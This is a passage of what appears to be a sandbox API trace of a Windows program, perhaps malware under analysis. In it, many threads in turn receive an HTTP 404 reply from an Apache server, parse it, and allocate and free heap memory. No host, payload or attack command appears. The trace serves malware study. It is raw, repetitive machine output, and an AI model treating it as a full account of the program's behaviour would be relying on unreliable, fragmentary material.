lpMem=0x6be838 | out: hHeap=0x6a0000) returned 1 [0172.575] GetProcessHeap () returned 0x6a0000 [0172.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 78 os_tid = 0xda0 [0172.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.782] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0172.784] GetProcessHeap () returned 0x6a0000 [0172.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be838 [0172.784] GetProcessHeap () returned 0x6a0000 [0172.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be838 | out: hHeap=0x6a0000) returned 1 [0172.784] GetProcessHeap () returned 0x6a0000 [0172.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 79 os_tid = 0x530 [0173.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.063] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0173.063] GetProcessHeap () returned 0x6a0000 [0173.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be910 [0173.063] GetProcessHeap () returned 0x6a0000 [0173.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be910 | out: hHeap=0x6a0000) returned 1 [0173.063] GetProcessHeap () returned 0x6a0000 [0173.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 80 os_tid = 0x5b4 [0173.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.464] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0173.470] GetProcessHeap () returned 0x6a0000 [0173.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be910 [0173.470] GetProcessHeap () returned 0x6a0000 [0173.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be910 | out: hHeap=0x6a0000) returned 1 [0173.470] GetProcessHeap () returned 0x6a0000 [0173.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 81 os_tid = 0x9ac [0173.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0173.969] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0173.969] GetProcessHeap () returned 0x6a0000 [0173.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be790 [0173.969] GetProcessHeap () returned 0x6a0000 [0173.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be790 | out: hHeap=0x6a0000) returned 1 [0173.969] GetProcessHeap () returned 0x6a0000 [0173.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 82 os_tid = 0x13a4 [0174.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.249] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0174.250] GetProcessHeap () returned 0x6a0000 [0174.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0174.250] GetProcessHeap () returned 0x6a0000 [0174.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0174.250] GetProcessHeap () returned 0x6a0000 [0174.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 83 os_tid = 0x12f8 [0174.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.631] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0174.631] GetProcessHeap () returned 0x6a0000 [0174.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0174.631] GetProcessHeap () returned 0x6a0000 [0174.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0174.631] GetProcessHeap () returned 0x6a0000 [0174.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 84 os_tid = 0xb68 [0174.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.859] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0174.859] GetProcessHeap () returned 0x6a0000 [0174.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0174.860] GetProcessHeap () returned 0x6a0000 [0174.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0174.860] GetProcessHeap () returned 0x6a0000 [0174.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 85 os_tid = 0x4d0 [0175.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.201] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0175.201] GetProcessHeap () returned 0x6a0000 [0175.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0175.201] GetProcessHeap () returned 0x6a0000 [0175.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0175.201] GetProcessHeap () returned 0x6a0000 [0175.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 86 os_tid = 0xed4 [0175.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.380] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0175.380] GetProcessHeap () returned 0x6a0000 [0175.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0175.380] GetProcessHeap () returned 0x6a0000 [0175.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0175.380] GetProcessHeap () returned 0x6a0000 [0175.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 87 os_tid = 0xed8 [0175.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.582] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0175.582] GetProcessHeap () returned 0x6a0000 [0175.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0175.582] GetProcessHeap () returned 0x6a0000 [0175.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0175.582] GetProcessHeap () returned 0x6a0000 [0175.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 88 os_tid = 0x1d0 [0175.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.745] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0175.746] GetProcessHeap () returned 0x6a0000 [0175.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0175.746] GetProcessHeap () returned 0x6a0000 [0175.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0175.746] GetProcessHeap () returned 0x6a0000 [0175.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 89 os_tid = 0xfb0 [0176.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.000] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0176.000] GetProcessHeap () returned 0x6a0000 [0176.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0176.000] GetProcessHeap () returned 0x6a0000 [0176.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0176.000] GetProcessHeap () returned 0x6a0000 [0176.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 90 os_tid = 0x338 [0176.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.203] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0176.203] GetProcessHeap () returned 0x6a0000 [0176.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0176.204] GetProcessHeap () returned 0x6a0000 [0176.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0176.204] GetProcessHeap () returned 0x6a0000 [0176.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 91 os_tid = 0x9b0 [0176.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.495] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0176.495] GetProcessHeap () returned 0x6a0000 [0176.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0176.495] GetProcessHeap () returned 0x6a0000 [0176.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0176.495] GetProcessHeap () returned 0x6a0000 [0176.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 92 os_tid = 0xea0 [0176.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.992] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0176.992] GetProcessHeap () returned 0x6a0000 [0176.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be868 [0176.992] GetProcessHeap () returned 0x6a0000 [0176.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be868 | out: hHeap=0x6a0000) returned 1 [0176.992] GetProcessHeap () returned 0x6a0000 [0176.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 93 os_tid = 0xc10 [0177.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.170] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0177.170] GetProcessHeap () returned 0x6a0000 [0177.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0177.170] GetProcessHeap () returned 0x6a0000 [0177.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0177.170] GetProcessHeap () returned 0x6a0000 [0177.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 94 os_tid = 0x1390 [0177.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.382] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0177.382] GetProcessHeap () returned 0x6a0000 [0177.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0177.382] GetProcessHeap () returned 0x6a0000 [0177.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0177.382] GetProcessHeap () returned 0x6a0000 [0177.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 95 os_tid = 0xc98 [0177.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.568] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0177.568] GetProcessHeap () returned 0x6a0000 [0177.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be910 [0177.568] GetProcessHeap () returned 0x6a0000 [0177.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be910 | out: hHeap=0x6a0000) returned 1 [0177.568] GetProcessHeap () returned 0x6a0000 [0177.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 96 os_tid = 0x13d0 [0177.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.754] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0177.754] GetProcessHeap () returned 0x6a0000 [0177.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be910 [0177.754] GetProcessHeap () returned 0x6a0000 [0177.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be910 | out: hHeap=0x6a0000) returned 1 [0177.754] GetProcessHeap () returned 0x6a0000 [0177.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 97 os_tid = 0xfe0 [0178.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.025] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0178.025] GetProcessHeap () returned 0x6a0000 [0178.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0178.025] GetProcessHeap () returned 0x6a0000 [0178.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0178.025] GetProcessHeap () returned 0x6a0000 [0178.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 98 os_tid = 0x4b0 [0178.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.254] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0178.254] GetProcessHeap () returned 0x6a0000 [0178.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0178.254] GetProcessHeap () returned 0x6a0000 [0178.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0178.255] GetProcessHeap () returned 0x6a0000 [0178.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 99 os_tid = 0x7ac [0178.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.480] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0178.480] GetProcessHeap () returned 0x6a0000 [0178.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0178.480] GetProcessHeap () returned 0x6a0000 [0178.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0178.480] GetProcessHeap () returned 0x6a0000 [0178.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 100 os_tid = 0x34c [0178.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.674] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0178.674] GetProcessHeap () returned 0x6a0000 [0178.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be970 [0178.674] GetProcessHeap () returned 0x6a0000 [0178.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be970 | out: hHeap=0x6a0000) returned 1 [0178.674] GetProcessHeap () returned 0x6a0000 [0178.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 101 os_tid = 0x798 [0178.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.946] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0178.946] GetProcessHeap () returned 0x6a0000 [0178.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be970 [0178.946] GetProcessHeap () returned 0x6a0000 [0178.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be970 | out: hHeap=0x6a0000) returned 1 [0178.946] GetProcessHeap () returned 0x6a0000 [0178.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 102 os_tid = 0x8d4 [0179.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.306] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0179.306] GetProcessHeap () returned 0x6a0000 [0179.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0179.306] GetProcessHeap () returned 0x6a0000 [0179.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0179.306] GetProcessHeap () returned 0x6a0000 [0179.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 103 os_tid = 0xa14 [0179.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.497] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0179.497] GetProcessHeap () returned 0x6a0000 [0179.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0179.498] GetProcessHeap () returned 0x6a0000 [0179.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0179.498] GetProcessHeap () returned 0x6a0000 [0179.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 104 os_tid = 0x101c [0179.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.707] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0179.707] GetProcessHeap () returned 0x6a0000 [0179.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0179.707] GetProcessHeap () returned 0x6a0000 [0179.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0179.707] GetProcessHeap () returned 0x6a0000 [0179.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 105 os_tid = 0x1020 [0179.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.900] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0179.900] GetProcessHeap () returned 0x6a0000 [0179.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0179.900] GetProcessHeap () returned 0x6a0000 [0179.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0179.901] GetProcessHeap () returned 0x6a0000 [0179.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 106 os_tid = 0x1034 [0180.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.123] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0180.123] GetProcessHeap () returned 0x6a0000 [0180.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0180.123] GetProcessHeap () returned 0x6a0000 [0180.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0180.123] GetProcessHeap () returned 0x6a0000 [0180.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 107 os_tid = 0x1038 [0180.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.332] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0180.332] GetProcessHeap () returned 0x6a0000 [0180.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0180.332] GetProcessHeap () returned 0x6a0000 [0180.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0180.332] GetProcessHeap () returned 0x6a0000 [0180.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 108 os_tid = 0x1044 